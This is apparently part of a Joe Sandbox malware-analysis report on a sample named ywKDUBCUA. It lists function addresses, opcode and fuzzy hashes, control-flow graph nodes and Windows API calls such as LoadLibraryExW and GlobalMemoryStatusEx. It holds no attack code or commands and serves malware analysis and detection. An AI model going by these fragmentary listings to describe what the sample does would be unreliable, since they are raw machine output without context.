                                              • Opcode Fuzzy Hash: 760f1d2063bd9e8a35bc0f8334cc9ddcafbc441880cb19a824e30bce46340afe
                                              • Instruction Fuzzy Hash: 08916CB1D0021ACFEB20DF68C851BEDBBB2FF49314F1485A9D808A7294DB749985CF91
                                              Function 016DB0E8 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 628 16db0e8-16db0f7 629 16db0f9-16db106 call 16d9b54 628->629 630 16db123-16db127 628->630 637 16db11c 629->637 638 16db108 629->638 631 16db129-16db133 630->631 632 16db13b-16db17c 630->632 631->632 639 16db17e-16db186 632->639 640 16db189-16db197 632->640 637->630 685 16db10e call 16db370 638->685 686 16db10e call 16db380 638->686 639->640 641 16db199-16db19e 640->641 642 16db1bb-16db1bd 640->642 645 16db1a9 641->645 646 16db1a0-16db1a7 call 16dad50 641->646 644 16db1c0-16db1c7 642->644 643 16db114-16db116 643->637 647 16db258-16db318 643->647 648 16db1c9-16db1d1 644->648 649 16db1d4-16db1db 644->649 651 16db1ab-16db1b9 645->651 646->651 678 16db31a-16db31d 647->678 679 16db320-16db34b GetModuleHandleW 647->679 648->649 652 16db1dd-16db1e5 649->652 653 16db1e8-16db1f1 call 16dad60 649->653 651->644 652->653 659 16db1fe-16db203 653->659 660 16db1f3-16db1fb 653->660 661 16db205-16db20c 659->661 662 16db221-16db225 659->662 660->659 661->662 664 16db20e-16db21e call 16dad70 call 16dad80 661->664 683 16db228 call 16db670 662->683 684 16db228 call 16db680 662->684 664->662 665 16db22b-16db22e 668 16db251-16db257 665->668 669 16db230-16db24e 665->669 669->668 678->679 680 16db34d-16db353 679->680 681 16db354-16db368 679->681 680->681 683->665 684->665 685->643 686->643
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 016DB33E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102365673.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_16d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: 1ac16d5b67002fd3049445fd69c8a5cf46da324a453357446e7a9341f81ea68f
                                              • Instruction ID: 56525f94822fc77c7b5a2eb2f246b2649d799e6dd195ca290da842e118976b00
                                              • Opcode Fuzzy Hash: 1ac16d5b67002fd3049445fd69c8a5cf46da324a453357446e7a9341f81ea68f
                                              • Instruction Fuzzy Hash: C07123B0A00B058FD724CF69D84576ABBF1FF89200F01892ED58ADBB54DB35E949CB91
                                              Function 016D44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 795 16d44b4-16d59b9 CreateActCtxA 798 16d59bb-16d59c1 795->798 799 16d59c2-16d5a1c 795->799 798->799 806 16d5a1e-16d5a21 799->806 807 16d5a2b-16d5a2f 799->807 806->807 808 16d5a31-16d5a3d 807->808 809 16d5a40 807->809 808->809 811 16d5a41 809->811 811->811
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 016D59A9
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102365673.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_16d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: c87b020ba96337c85a8b106d59facb55b2d4a9fd39f721790bec4dde15cb34e1
                                              • Instruction ID: 0cc5ca80a6277a7bde0b8a4300578f7441b81d659eca140c2c961915b95952ee
                                              • Opcode Fuzzy Hash: c87b020ba96337c85a8b106d59facb55b2d4a9fd39f721790bec4dde15cb34e1
                                              • Instruction Fuzzy Hash: A041E2B0C00719CFDB24CFA9C884B9EBBF5BF49304F24806AD409AB251DB756945CF90
                                              Function 016D58EC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 812 16d58ec-16d59b9 CreateActCtxA 814 16d59bb-16d59c1 812->814 815 16d59c2-16d5a1c 812->815 814->815 822 16d5a1e-16d5a21 815->822 823 16d5a2b-16d5a2f 815->823 822->823 824 16d5a31-16d5a3d 823->824 825 16d5a40 823->825 824->825 827 16d5a41 825->827 827->827
                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 016D59A9
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102365673.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_16d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: d405bfcce3753f5cc2e41e1451ec83d9d7bb8248ef3926747c931770844a9efa
                                              • Instruction ID: 0f1f6297ee67e94fb44b0038a0e3323893cffbb4ae31a8b9d2050353168575b0
                                              • Opcode Fuzzy Hash: d405bfcce3753f5cc2e41e1451ec83d9d7bb8248ef3926747c931770844a9efa
                                              • Instruction Fuzzy Hash: 1341E2B1C00759CFDB24CFA9C884B9EBBF6BF89304F24805AD409AB261DB756949CF51
                                              Function 016DD0F8 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 828 16dd0f8-16dd65c DuplicateHandle 830 16dd65e-16dd664 828->830 831 16dd665-16dd682 828->831 830->831
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016DD58E,?,?,?,?,?), ref: 016DD64F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102365673.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_16d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: e00f21905d761ac776b98518ca5264fc7584639e4722ddd633791ef10a5afd0d
                                              • Instruction ID: de73cfb082acaf46d5b787e13aba08221845843bbda7cdf6b4a501b928350606
                                              • Opcode Fuzzy Hash: e00f21905d761ac776b98518ca5264fc7584639e4722ddd633791ef10a5afd0d
                                              • Instruction Fuzzy Hash: FB21E6B5D002589FDB10DF99D984AEEBFF4FB48310F14845AE918A3350D374A950CFA4
                                              Function 016DD5C2 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 834 16dd5c2-16dd5c3 835 16dd5c8-16dd65c DuplicateHandle 834->835 836 16dd65e-16dd664 835->836 837 16dd665-16dd682 835->837 836->837
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,016DD58E,?,?,?,?,?), ref: 016DD64F
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102365673.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_16d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 45526ce4927f0f446c3432424762af62d59d8911afd95f3fe28cf16568614c2f
                                              • Instruction ID: 8aa898fe27218617c231516e0a77b48a51c894f38a2f79cb969e4492f3dbf063
                                              • Opcode Fuzzy Hash: 45526ce4927f0f446c3432424762af62d59d8911afd95f3fe28cf16568614c2f
                                              • Instruction Fuzzy Hash: C921E4B5D002589FDB10CFAAD984AEEBFF8FB48310F14841AE958A3350D374A940CFA4
                                              Function 016DAD9C Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 840 16dad9c-16db5a0 842 16db5a8-16db5d7 LoadLibraryExW 840->842 843 16db5a2-16db5a5 840->843 844 16db5d9-16db5df 842->844 845 16db5e0-16db5fd 842->845 843->842 844->845
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016DB3B9,00000800,00000000,00000000), ref: 016DB5CA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102365673.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_16d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 18ae05c7c003e840a7457656e1748c04258eafdf6a45853bac51214d5ed6a0a0
                                              • Instruction ID: 208b4c1cc37cbf4496123a06682bb9a0efa3610bc5ab8881cce5d300eee7e704
                                              • Opcode Fuzzy Hash: 18ae05c7c003e840a7457656e1748c04258eafdf6a45853bac51214d5ed6a0a0
                                              • Instruction Fuzzy Hash: 421114B6D002098FDB10CF9AC844A9EFBF4EB89310F54846ED919A7310C375A945CFA4
                                              Function 016DB558 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,016DB3B9,00000800,00000000,00000000), ref: 016DB5CA
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102365673.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_16d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 52dbfa42a09dde03c1c5f78cf90c0ca18905d98a20bf2638120c845b14e4591f
                                              • Instruction ID: 6f9698cc6a4f0ce2ad30e171f8cae45aa4b63de199baa890d6584128de0a3c62
                                              • Opcode Fuzzy Hash: 52dbfa42a09dde03c1c5f78cf90c0ca18905d98a20bf2638120c845b14e4591f
                                              • Instruction Fuzzy Hash: BC1100B6C002099FDB10CF9AC884ADEFBF8EF89310F14842AE959A7200C375A545CFA4
                                              Function 016DB2D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 016DB33E
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102365673.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_16d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: af539106329dd621c145d9770ce14b4e8825add380d03b52a6137aa5a4bcef96
                                              • Instruction ID: 2700647894b077f8b7087cb5492c8af7f7e069490a469fad3aa5e8ab10d86763
                                              • Opcode Fuzzy Hash: af539106329dd621c145d9770ce14b4e8825add380d03b52a6137aa5a4bcef96
                                              • Instruction Fuzzy Hash: 081110B6C002498FDB20CF9AC844ADEFBF4EB88324F15841AD919A7310C375A545CFA1
                                              Function 050D194C Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 050D381D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2105124806.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_50d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 25df436fbc8a1cf1397e742d0c142889edd79ddd39ce65e154da9271f65c375b
                                              • Instruction ID: 03e22be09446b446e5c93c76ce99ec284b419c956f7ec00472cc88c2eecdef2f
                                              • Opcode Fuzzy Hash: 25df436fbc8a1cf1397e742d0c142889edd79ddd39ce65e154da9271f65c375b
                                              • Instruction Fuzzy Hash: 9611E3B58003499FDB20DF99D984BDEFBF8EB48310F108859E555A7210C375A944CFA1
                                              Function 050D37B9 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 050D381D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2105124806.00000000050D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050D0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_50d0000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: b7ac8bdd7bdd92bfe53d7658f9dc0abe88621b9e16a061629582cbca4b1a33dd
                                              • Instruction ID: 2c7a751a871b42abaf56b922754aab5daba40d6a01ac89adbce3afb776942388
                                              • Opcode Fuzzy Hash: b7ac8bdd7bdd92bfe53d7658f9dc0abe88621b9e16a061629582cbca4b1a33dd
                                              • Instruction Fuzzy Hash: 2E11F2B58003499FCB10CF9AD885BEEFBF8FB48320F108819E959A3210C375A944CFA1
                                              Function 0167D034 Relevance: .1, Instructions: 87COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102029639.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_167d000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c1087d130fb6d44312cebef9ee0f57ff0046e2d24dc6b21f429eef9d78bba83e
                                              • Instruction ID: 545691a995217dd7342763eaff55d19032a53943f0c7cbd307fae8efca272759
                                              • Opcode Fuzzy Hash: c1087d130fb6d44312cebef9ee0f57ff0046e2d24dc6b21f429eef9d78bba83e
                                              • Instruction Fuzzy Hash: D4318F7554C3809FD703DF64ED90715BF61EF46214F18C9EAC8458B2A3D33A980ACB62
                                              Function 0167D055 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102029639.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_167d000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c60a99b6270a3a026040d8d2b59ff031181ae3183534cba7710598adb80c9051
                                              • Instruction ID: 31ef92647f893171befee4bd8f3fde37c408f3817d76fd76217b6997dfe8f849
                                              • Opcode Fuzzy Hash: c60a99b6270a3a026040d8d2b59ff031181ae3183534cba7710598adb80c9051
                                              • Instruction Fuzzy Hash: 3D2180755483809FD703CF64D994715BFB1EF46224F18C9EAD8498B2A7C33A980ACB62
                                              Function 0167D294 Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102029639.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_167d000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 07153b95db4a26de77347dc0f11264d38db7b336c3bb41093ed780bfe625d2f2
                                              • Instruction ID: 30aa41707091e31aeba86e03eb81bfd412f353ae2af7de056511aa91aa90dcb7
                                              • Opcode Fuzzy Hash: 07153b95db4a26de77347dc0f11264d38db7b336c3bb41093ed780bfe625d2f2
                                              • Instruction Fuzzy Hash: 5221D075604204EFDB05DFA8D980B26BBA5FF89324F24C96DD94A4B346C33AD806CA61
                                              Function 0167D0DC Relevance: .1, Instructions: 72COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102029639.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_167d000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9a2f6675439903229d710c3d2e9dbf6723578ba6062c8111572dd26d0ff13b51
                                              • Instruction ID: e5d30188f4ba1b2e2e8c6d58b2da4633ed20f0791d6a2cdaad802ed06e6d3132
                                              • Opcode Fuzzy Hash: 9a2f6675439903229d710c3d2e9dbf6723578ba6062c8111572dd26d0ff13b51
                                              • Instruction Fuzzy Hash: 9021F275604204EFDB05DF58ED80B26BB65EF88325F24C96DD90A4B396C33AD846CA61
                                              Function 0167D28F Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2102029639.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_167d000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                              • Instruction ID: 3ef8fe75a6962a9c8e3603b2503cea38b3779a8972d78cf82062e8b8a7523278
                                              • Opcode Fuzzy Hash: c74efafe6a787794d2e52374dfad20fc7a218ab120a23d42f416259975cce95d
                                              • Instruction Fuzzy Hash: 3E11BB75504280CFDB02CF54D9C4B19BFA1FF85324F28CAAAD8494B356C33AD40ACB62

                                              Execution Graph

                                              Execution Coverage:8.4%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:73
                                              Total number of Limit Nodes:9
                                              execution_graph 46607 5eac2d0 46609 5eac2e0 46607->46609 46608 5eac330 46609->46608 46611 5eaaadc 46609->46611 46612 5eaaae7 46611->46612 46616 6850918 46612->46616 46621 6850928 46612->46621 46613 5eac3d9 46613->46608 46617 6850928 46616->46617 46618 6850965 46617->46618 46627 6850b90 46617->46627 46632 6850ba0 46617->46632 46618->46613 46623 6850959 46621->46623 46624 68509a5 46621->46624 46622 6850965 46622->46613 46623->46622 46625 6850b90 LoadLibraryExW 46623->46625 46626 6850ba0 LoadLibraryExW 46623->46626 46624->46613 46625->46624 46626->46624 46628 6850ba0 46627->46628 46636 6850bd0 46628->46636 46643 6850be0 46628->46643 46629 6850baa 46629->46618 46634 6850bd0 LoadLibraryExW 46632->46634 46635 6850be0 LoadLibraryExW 46632->46635 46633 6850baa 46633->46618 46634->46633 46635->46633 46637 6850be0 46636->46637 46638 6850c14 46637->46638 46641 6850bd0 LoadLibraryExW 46637->46641 46642 6850be0 LoadLibraryExW 46637->46642 46638->46629 46639 6850c0c 46639->46638 46650 6850558 46639->46650 46641->46639 46642->46639 46644 6850bf1 46643->46644 46646 6850c14 46643->46646 46644->46646 46648 6850bd0 LoadLibraryExW 46644->46648 46649 6850be0 LoadLibraryExW 46644->46649 46645 6850c0c 46645->46646 46647 6850558 LoadLibraryExW 46645->46647 46646->46629 46647->46646 46648->46645 46649->46645 46651 6850e30 LoadLibraryExW 46650->46651 46653 6850ea9 46651->46653 46653->46638 46654 f20848 46656 f2084e 46654->46656 46655 f2091b 46656->46655 46659 f21457 46656->46659 46665 f2133f 46656->46665 46660 f21463 46659->46660 46661 f21356 46659->46661 46660->46656 46662 f21454 46661->46662 46664 f21457 GlobalMemoryStatusEx 46661->46664 46670 f27128 46661->46670 46662->46656 46664->46661 46666 f212e3 46665->46666 46667 f21343 46665->46667 46666->46656 46667->46666 46668 f21457 GlobalMemoryStatusEx 46667->46668 46669 f27128 GlobalMemoryStatusEx 46667->46669 46668->46667 46669->46667 46671 f27132 46670->46671 46672 f27174 46671->46672 46678 5d6d2b0 46671->46678 46683 5d6d2a0 46671->46683 46672->46661 46673 f27145 46688 5d6e258 46673->46688 46692 5d6e248 46673->46692 46680 5d6d2c5 46678->46680 46679 5d6d4da 46679->46673 46680->46679 46681 5d6d500 GlobalMemoryStatusEx 46680->46681 46682 5d6d4f0 GlobalMemoryStatusEx 46680->46682 46681->46680 46682->46680 46685 5d6d2c5 46683->46685 46684 5d6d4da 46684->46673 46685->46684 46686 5d6d4f0 GlobalMemoryStatusEx 46685->46686 46687 5d6d500 GlobalMemoryStatusEx 46685->46687 46686->46685 46687->46685 46690 5d6e272 46688->46690 46689 5d6e4b9 46689->46672 46690->46689 46691 5d6d500 GlobalMemoryStatusEx 46690->46691 46691->46690 46695 5d6e258 46692->46695 46693 5d6e4b9 46693->46672 46694 5d6d500 GlobalMemoryStatusEx 46694->46695 46695->46693 46695->46694

                                              Executed Functions

                                              Function 00F29BE0 Relevance: 2.8, Instructions: 2810COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bc0931593aed4dc0e51e964f7cc51f742ba68ed96a611b17d49e392c839b8b24
                                              • Instruction ID: c8c43d1ef44e1d518d684232a4c703e1713fa83483d7d60a698982c477e5a15b
                                              • Opcode Fuzzy Hash: bc0931593aed4dc0e51e964f7cc51f742ba68ed96a611b17d49e392c839b8b24
                                              • Instruction Fuzzy Hash: 87530731D10B1A8ACB51EF68C8845A9F7B1FF99310F11C79AE45877221FB70AAD5CB81
                                              Function 00F2CE60 Relevance: 2.3, Instructions: 2302COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a0c2717c82fb1cba1066a92bb3c0453dabe37e59e78801c42d380f333ccc477b
                                              • Instruction ID: 2831b7bce1c8cc1f7075f91a181e105aa1cc1637b39b651556249f18c5f8fe49
                                              • Opcode Fuzzy Hash: a0c2717c82fb1cba1066a92bb3c0453dabe37e59e78801c42d380f333ccc477b
                                              • Instruction Fuzzy Hash: 3E331D31D107198EDB11EF68C8946ADF7B1FF99300F15C79AE448AB251EB70AAC5CB81
                                              Function 00F24A68 Relevance: .3, Instructions: 266COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5fe25aa8ccb533990553cf14c7f017971d80cb9882365963de7d26597102b541
                                              • Instruction ID: d6aeffe46a42e3699dcdc2d9771981f587949e7b8bf5dcc56e9edd5ebd4a6de3
                                              • Opcode Fuzzy Hash: 5fe25aa8ccb533990553cf14c7f017971d80cb9882365963de7d26597102b541
                                              • Instruction Fuzzy Hash: 09B15071E002198FDF14CFA9E88579DBBF2BF88324F148529D815E7394EBB4A845DB81
                                              Function 00F23E50 Relevance: .2, Instructions: 238COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3266835259.0000000000F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F20000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_f20000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6f2f175c59e0d58a24ca06b27a9d3b3e645c4dd54e393d1b9251063e415e00ff
                                              • Instruction ID: 2283830a645f567e9e5eca55f5a83332d3629782f0cfed638993d1f59a9b4b68
                                              • Opcode Fuzzy Hash: 6f2f175c59e0d58a24ca06b27a9d3b3e645c4dd54e393d1b9251063e415e00ff
                                              • Instruction Fuzzy Hash: 98918FB0E00219DFDF14CFA8E98579EBBF2EF88314F148129E415E7254EB789985DB81
                                              Function 05D6E0B8 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2789 5d6e0b8-5d6e0d3 2790 5d6e0d5-5d6e0fc call 5d6ce34 2789->2790 2791 5d6e0fd-5d6e11c call 5d6ce40 2789->2791 2797 5d6e122-5d6e181 2791->2797 2798 5d6e11e-5d6e121 2791->2798 2806 5d6e187-5d6e214 GlobalMemoryStatusEx 2797->2806 2807 5d6e183-5d6e186 2797->2807 2811 5d6e216-5d6e21c 2806->2811 2812 5d6e21d-5d6e245 2806->2812 2811->2812
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3278010210.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_5d60000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3970921be167ca180f3043d50352db0c58e8744cfa8a6b7cf935fbdc5877f374
                                              • Instruction ID: 1e7a128965111393320b95512f602cb30f4260c9ea700fe3e05e2cf809a82407
                                              • Opcode Fuzzy Hash: 3970921be167ca180f3043d50352db0c58e8744cfa8a6b7cf935fbdc5877f374
                                              • Instruction Fuzzy Hash: FC412472D043958FCB11CFB9D84469EBFF5EF89220F14856BD445A7281DB389846CBA0
                                              Function 06850E2A Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06850E09,00000800,?,00000000), ref: 06850E9A
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3280146421.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_6850000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 4d1efc51b1779213d2db22cce5d932c5e8a754a8f953ac827d1be348808fe1cb
                                              • Instruction ID: 68ec9ffc5a3029f998ddf0932ea2d4715d9a4badccc14e6443bd59ce6c09ba38
                                              • Opcode Fuzzy Hash: 4d1efc51b1779213d2db22cce5d932c5e8a754a8f953ac827d1be348808fe1cb
                                              • Instruction Fuzzy Hash: 541126B6C003499FCB10CF9AC844ADEFBF5EB48320F10842AE919A7210C375A545CFA5
                                              Function 06850558 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2815 6850558-6850e70 2817 6850e72-6850e75 2815->2817 2818 6850e78-6850ea7 LoadLibraryExW 2815->2818 2817->2818 2819 6850eb0-6850ecd 2818->2819 2820 6850ea9-6850eaf 2818->2820 2820->2819
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,06850E09,00000800,?,00000000), ref: 06850E9A
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3280146421.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_6850000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 435b327bee8359f87d312c60cdb3a4bee3eb13c472ce40e43ce1d4edebc05681
                                              • Instruction ID: 9194e6862eb07bdb96c7ce8599dd3d9bac8ce97dd7d6fa8ca40d90f6f28976e4
                                              • Opcode Fuzzy Hash: 435b327bee8359f87d312c60cdb3a4bee3eb13c472ce40e43ce1d4edebc05681
                                              • Instruction Fuzzy Hash: F51123B6D003498FDB10CF9AC844ADEFBF5EB88320F14842EE919A7210C375A945CFA5
                                              Function 05D6E1A0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                              Download Yara Rule
                                              APIs
                                              • GlobalMemoryStatusEx.KERNELBASE ref: 05D6E207
                                              Memory Dump Source
                                              • Source File: 00000010.00000002.3278010210.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_16_2_5d60000_ywKDUBCUA.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: 47e8058dc7c3f02d9ef563d9d8a9d1a15a73a191e4bd622f1e6d71dfab52c1e0
